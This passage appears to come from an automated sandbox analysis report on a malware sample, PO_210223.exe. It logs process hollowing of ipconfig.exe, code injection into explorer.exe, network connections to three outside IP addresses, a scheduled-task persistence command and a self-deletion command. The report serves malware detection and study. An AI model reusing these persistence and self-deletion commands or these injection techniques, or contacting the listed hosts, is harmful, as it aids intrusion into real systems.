Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0347AE73 mov eax, dword ptr fs:[00000030h]	13_2_0347AE73
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0347AE73 mov eax, dword ptr fs:[00000030h]	13_2_0347AE73
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0347AE73 mov eax, dword ptr fs:[00000030h]	13_2_0347AE73
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0345C600 mov eax, dword ptr fs:[00000030h]	13_2_0345C600
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0345C600 mov eax, dword ptr fs:[00000030h]	13_2_0345C600
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0345C600 mov eax, dword ptr fs:[00000030h]	13_2_0345C600
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03488E00 mov eax, dword ptr fs:[00000030h]	13_2_03488E00
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03468A0A mov eax, dword ptr fs:[00000030h]	13_2_03468A0A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0345AA16 mov eax, dword ptr fs:[00000030h]	13_2_0345AA16
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0345AA16 mov eax, dword ptr fs:[00000030h]	13_2_0345AA16
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0348A61C mov eax, dword ptr fs:[00000030h]	13_2_0348A61C
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0348A61C mov eax, dword ptr fs:[00000030h]	13_2_0348A61C
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03455210 mov eax, dword ptr fs:[00000030h]	13_2_03455210
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03455210 mov ecx, dword ptr fs:[00000030h]	13_2_03455210
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03455210 mov eax, dword ptr fs:[00000030h]	13_2_03455210
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03455210 mov eax, dword ptr fs:[00000030h]	13_2_03455210
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03511608 mov eax, dword ptr fs:[00000030h]	13_2_03511608
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03473A1C mov eax, dword ptr fs:[00000030h]	13_2_03473A1C
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0345E620 mov eax, dword ptr fs:[00000030h]	13_2_0345E620
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03494A2C mov eax, dword ptr fs:[00000030h]	13_2_03494A2C
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03494A2C mov eax, dword ptr fs:[00000030h]	13_2_03494A2C
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0350FE3F mov eax, dword ptr fs:[00000030h]	13_2_0350FE3F
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03482ACB mov eax, dword ptr fs:[00000030h]	13_2_03482ACB
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03528ED6 mov eax, dword ptr fs:[00000030h]	13_2_03528ED6
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034836CC mov eax, dword ptr fs:[00000030h]	13_2_034836CC
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03498EC7 mov eax, dword ptr fs:[00000030h]	13_2_03498EC7
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0350FEC0 mov eax, dword ptr fs:[00000030h]	13_2_0350FEC0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034676E2 mov eax, dword ptr fs:[00000030h]	13_2_034676E2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034816E0 mov ecx, dword ptr fs:[00000030h]	13_2_034816E0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03482AE4 mov eax, dword ptr fs:[00000030h]	13_2_03482AE4
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034EFE87 mov eax, dword ptr fs:[00000030h]	13_2_034EFE87
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0348D294 mov eax, dword ptr fs:[00000030h]	13_2_0348D294
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0348D294 mov eax, dword ptr fs:[00000030h]	13_2_0348D294
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034552A5 mov eax, dword ptr fs:[00000030h]	13_2_034552A5
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034552A5 mov eax, dword ptr fs:[00000030h]	13_2_034552A5
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034552A5 mov eax, dword ptr fs:[00000030h]	13_2_034552A5
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034552A5 mov eax, dword ptr fs:[00000030h]	13_2_034552A5
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034552A5 mov eax, dword ptr fs:[00000030h]	13_2_034552A5
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034D46A7 mov eax, dword ptr fs:[00000030h]	13_2_034D46A7
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0346AAB0 mov eax, dword ptr fs:[00000030h]	13_2_0346AAB0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0346AAB0 mov eax, dword ptr fs:[00000030h]	13_2_0346AAB0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03520EA5 mov eax, dword ptr fs:[00000030h]	13_2_03520EA5
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03520EA5 mov eax, dword ptr fs:[00000030h]	13_2_03520EA5
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03520EA5 mov eax, dword ptr fs:[00000030h]	13_2_03520EA5
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0348FAB0 mov eax, dword ptr fs:[00000030h]	13_2_0348FAB0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0347B944 mov eax, dword ptr fs:[00000030h]	13_2_0347B944
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0347B944 mov eax, dword ptr fs:[00000030h]	13_2_0347B944
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03493D43 mov eax, dword ptr fs:[00000030h]	13_2_03493D43
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034D3540 mov eax, dword ptr fs:[00000030h]	13_2_034D3540
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03477D50 mov eax, dword ptr fs:[00000030h]	13_2_03477D50
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0345C962 mov eax, dword ptr fs:[00000030h]	13_2_0345C962
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0347C577 mov eax, dword ptr fs:[00000030h]	13_2_0347C577
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0347C577 mov eax, dword ptr fs:[00000030h]	13_2_0347C577
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0345B171 mov eax, dword ptr fs:[00000030h]	13_2_0345B171
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0345B171 mov eax, dword ptr fs:[00000030h]	13_2_0345B171
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03459100 mov eax, dword ptr fs:[00000030h]	13_2_03459100
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03459100 mov eax, dword ptr fs:[00000030h]	13_2_03459100
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03459100 mov eax, dword ptr fs:[00000030h]	13_2_03459100
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03528D34 mov eax, dword ptr fs:[00000030h]	13_2_03528D34
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03474120 mov eax, dword ptr fs:[00000030h]	13_2_03474120
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03474120 mov eax, dword ptr fs:[00000030h]	13_2_03474120
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03474120 mov eax, dword ptr fs:[00000030h]	13_2_03474120
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03474120 mov eax, dword ptr fs:[00000030h]	13_2_03474120
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03474120 mov ecx, dword ptr fs:[00000030h]	13_2_03474120
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0348513A mov eax, dword ptr fs:[00000030h]	13_2_0348513A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0348513A mov eax, dword ptr fs:[00000030h]	13_2_0348513A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03463D34 mov eax, dword ptr fs:[00000030h]	13_2_03463D34
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03463D34 mov eax, dword ptr fs:[00000030h]	13_2_03463D34
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03463D34 mov eax, dword ptr fs:[00000030h]	13_2_03463D34
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03463D34 mov eax, dword ptr fs:[00000030h]	13_2_03463D34
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03463D34 mov eax, dword ptr fs:[00000030h]	13_2_03463D34
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03463D34 mov eax, dword ptr fs:[00000030h]	13_2_03463D34
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03463D34 mov eax, dword ptr fs:[00000030h]	13_2_03463D34
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03463D34 mov eax, dword ptr fs:[00000030h]	13_2_03463D34
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03463D34 mov eax, dword ptr fs:[00000030h]	13_2_03463D34
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03463D34 mov eax, dword ptr fs:[00000030h]	13_2_03463D34
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03463D34 mov eax, dword ptr fs:[00000030h]	13_2_03463D34
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03463D34 mov eax, dword ptr fs:[00000030h]	13_2_03463D34
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03463D34 mov eax, dword ptr fs:[00000030h]	13_2_03463D34
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03484D3B mov eax, dword ptr fs:[00000030h]	13_2_03484D3B
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03484D3B mov eax, dword ptr fs:[00000030h]	13_2_03484D3B
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03484D3B mov eax, dword ptr fs:[00000030h]	13_2_03484D3B
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0345AD30 mov eax, dword ptr fs:[00000030h]	13_2_0345AD30
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034DA537 mov eax, dword ptr fs:[00000030h]	13_2_034DA537
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034D6DC9 mov eax, dword ptr fs:[00000030h]	13_2_034D6DC9
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034D6DC9 mov eax, dword ptr fs:[00000030h]	13_2_034D6DC9
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034D6DC9 mov eax, dword ptr fs:[00000030h]	13_2_034D6DC9
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034D6DC9 mov ecx, dword ptr fs:[00000030h]	13_2_034D6DC9
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034D6DC9 mov eax, dword ptr fs:[00000030h]	13_2_034D6DC9
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034D6DC9 mov eax, dword ptr fs:[00000030h]	13_2_034D6DC9
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03508DF1 mov eax, dword ptr fs:[00000030h]	13_2_03508DF1
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0345B1E1 mov eax, dword ptr fs:[00000030h]	13_2_0345B1E1
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0345B1E1 mov eax, dword ptr fs:[00000030h]	13_2_0345B1E1
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0345B1E1 mov eax, dword ptr fs:[00000030h]	13_2_0345B1E1
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034E41E8 mov eax, dword ptr fs:[00000030h]	13_2_034E41E8
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0346D5E0 mov eax, dword ptr fs:[00000030h]	13_2_0346D5E0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0346D5E0 mov eax, dword ptr fs:[00000030h]	13_2_0346D5E0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0347C182 mov eax, dword ptr fs:[00000030h]	13_2_0347C182
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03482581 mov eax, dword ptr fs:[00000030h]	13_2_03482581
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03482581 mov eax, dword ptr fs:[00000030h]	13_2_03482581
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03482581 mov eax, dword ptr fs:[00000030h]	13_2_03482581
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03482581 mov eax, dword ptr fs:[00000030h]	13_2_03482581
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0348A185 mov eax, dword ptr fs:[00000030h]	13_2_0348A185
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03452D8A mov eax, dword ptr fs:[00000030h]	13_2_03452D8A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03452D8A mov eax, dword ptr fs:[00000030h]	13_2_03452D8A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03452D8A mov eax, dword ptr fs:[00000030h]	13_2_03452D8A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03452D8A mov eax, dword ptr fs:[00000030h]	13_2_03452D8A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03452D8A mov eax, dword ptr fs:[00000030h]	13_2_03452D8A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0348FD9B mov eax, dword ptr fs:[00000030h]	13_2_0348FD9B
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0348FD9B mov eax, dword ptr fs:[00000030h]	13_2_0348FD9B
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03482990 mov eax, dword ptr fs:[00000030h]	13_2_03482990
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034861A0 mov eax, dword ptr fs:[00000030h]	13_2_034861A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034861A0 mov eax, dword ptr fs:[00000030h]	13_2_034861A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034835A1 mov eax, dword ptr fs:[00000030h]	13_2_034835A1
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034D69A6 mov eax, dword ptr fs:[00000030h]	13_2_034D69A6
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034D51BE mov eax, dword ptr fs:[00000030h]	13_2_034D51BE
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034D51BE mov eax, dword ptr fs:[00000030h]	13_2_034D51BE
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034D51BE mov eax, dword ptr fs:[00000030h]	13_2_034D51BE
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034D51BE mov eax, dword ptr fs:[00000030h]	13_2_034D51BE
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03481DB5 mov eax, dword ptr fs:[00000030h]	13_2_03481DB5
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03481DB5 mov eax, dword ptr fs:[00000030h]	13_2_03481DB5
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03481DB5 mov eax, dword ptr fs:[00000030h]	13_2_03481DB5
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_035205AC mov eax, dword ptr fs:[00000030h]	13_2_035205AC
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_035205AC mov eax, dword ptr fs:[00000030h]	13_2_035205AC
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0348A44B mov eax, dword ptr fs:[00000030h]	13_2_0348A44B
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03470050 mov eax, dword ptr fs:[00000030h]	13_2_03470050
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03470050 mov eax, dword ptr fs:[00000030h]	13_2_03470050
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034EC450 mov eax, dword ptr fs:[00000030h]	13_2_034EC450
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034EC450 mov eax, dword ptr fs:[00000030h]	13_2_034EC450
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03512073 mov eax, dword ptr fs:[00000030h]	13_2_03512073
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03521074 mov eax, dword ptr fs:[00000030h]	13_2_03521074
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0347746D mov eax, dword ptr fs:[00000030h]	13_2_0347746D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03524015 mov eax, dword ptr fs:[00000030h]	13_2_03524015
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03524015 mov eax, dword ptr fs:[00000030h]	13_2_03524015
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034D6C0A mov eax, dword ptr fs:[00000030h]	13_2_034D6C0A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034D6C0A mov eax, dword ptr fs:[00000030h]	13_2_034D6C0A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034D6C0A mov eax, dword ptr fs:[00000030h]	13_2_034D6C0A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034D6C0A mov eax, dword ptr fs:[00000030h]	13_2_034D6C0A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03511C06 mov eax, dword ptr fs:[00000030h]	13_2_03511C06
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03511C06 mov eax, dword ptr fs:[00000030h]	13_2_03511C06
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03511C06 mov eax, dword ptr fs:[00000030h]	13_2_03511C06
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03511C06 mov eax, dword ptr fs:[00000030h]	13_2_03511C06
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03511C06 mov eax, dword ptr fs:[00000030h]	13_2_03511C06
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03511C06 mov eax, dword ptr fs:[00000030h]	13_2_03511C06
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03511C06 mov eax, dword ptr fs:[00000030h]	13_2_03511C06
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03511C06 mov eax, dword ptr fs:[00000030h]	13_2_03511C06
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03511C06 mov eax, dword ptr fs:[00000030h]	13_2_03511C06
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03511C06 mov eax, dword ptr fs:[00000030h]	13_2_03511C06
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03511C06 mov eax, dword ptr fs:[00000030h]	13_2_03511C06
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03511C06 mov eax, dword ptr fs:[00000030h]	13_2_03511C06
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03511C06 mov eax, dword ptr fs:[00000030h]	13_2_03511C06
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03511C06 mov eax, dword ptr fs:[00000030h]	13_2_03511C06
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034D7016 mov eax, dword ptr fs:[00000030h]	13_2_034D7016
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034D7016 mov eax, dword ptr fs:[00000030h]	13_2_034D7016
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034D7016 mov eax, dword ptr fs:[00000030h]	13_2_034D7016
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0352740D mov eax, dword ptr fs:[00000030h]	13_2_0352740D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0352740D mov eax, dword ptr fs:[00000030h]	13_2_0352740D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0352740D mov eax, dword ptr fs:[00000030h]	13_2_0352740D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0348BC2C mov eax, dword ptr fs:[00000030h]	13_2_0348BC2C
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0348002D mov eax, dword ptr fs:[00000030h]	13_2_0348002D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0348002D mov eax, dword ptr fs:[00000030h]	13_2_0348002D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0348002D mov eax, dword ptr fs:[00000030h]	13_2_0348002D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0348002D mov eax, dword ptr fs:[00000030h]	13_2_0348002D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0348002D mov eax, dword ptr fs:[00000030h]	13_2_0348002D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0346B02A mov eax, dword ptr fs:[00000030h]	13_2_0346B02A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0346B02A mov eax, dword ptr fs:[00000030h]	13_2_0346B02A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0346B02A mov eax, dword ptr fs:[00000030h]	13_2_0346B02A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_0346B02A mov eax, dword ptr fs:[00000030h]	13_2_0346B02A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_03528CD6 mov eax, dword ptr fs:[00000030h]	13_2_03528CD6
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034EB8D0 mov eax, dword ptr fs:[00000030h]	13_2_034EB8D0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034EB8D0 mov ecx, dword ptr fs:[00000030h]	13_2_034EB8D0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034EB8D0 mov eax, dword ptr fs:[00000030h]	13_2_034EB8D0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034EB8D0 mov eax, dword ptr fs:[00000030h]	13_2_034EB8D0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 13_2_034EB8D0 mov eax, dword ptr fs:[00000030h]	13_2_034EB8D0

Source: C:\Users\user\Desktop\PO_210223.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\PO_210223.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 204.11.56.48 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 103.66.59.142 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.229.197.103 80	Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\PO_210223.exe

Memory written: C:\Users\user\Desktop\PO_210223.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\PO_210223.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\PO_210223.exe	Thread register set: target process: 3424			Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Thread register set: target process: 3424			Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\PO_210223.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\PO_210223.exe

Section unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: E50000

Jump to behavior

Source: C:\Users\user\Desktop\PO_210223.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kwqifureL' /XML 'C:\Users\user\AppData\Local\Temp\tmp33D2.tmp'	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Process created: C:\Users\user\Desktop\PO_210223.exe C:\Users\user\Desktop\PO_210223.exe	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO_210223.exe'	Jump to behavior

Source: explorer.exe, 0000000A.00000002.907526127.0000000000AD8000.00000004.00000020.sdmp	Binary or memory string: ProgmanMD6
Source: explorer.exe, 0000000A.00000000.679171156.0000000001080000.00000002.00000001.sdmp, ipconfig.exe, 0000000D.00000002.911200125.00000000048C0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 0000000A.00000000.679171156.0000000001080000.00000002.00000001.sdmp, ipconfig.exe, 0000000D.00000002.911200125.00000000048C0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000A.00000000.679171156.0000000001080000.00000002.00000001.sdmp, ipconfig.exe, 0000000D.00000002.911200125.00000000048C0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000000A.00000000.679171156.0000000001080000.00000002.00000001.sdmp, ipconfig.exe, 0000000D.00000002.911200125.00000000048C0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 0000000A.00000000.695811785.000000000A716000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWnd5D

Language, Device and Operating System Detection:

Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Users\user\Desktop\PO_210223.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO_210223.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
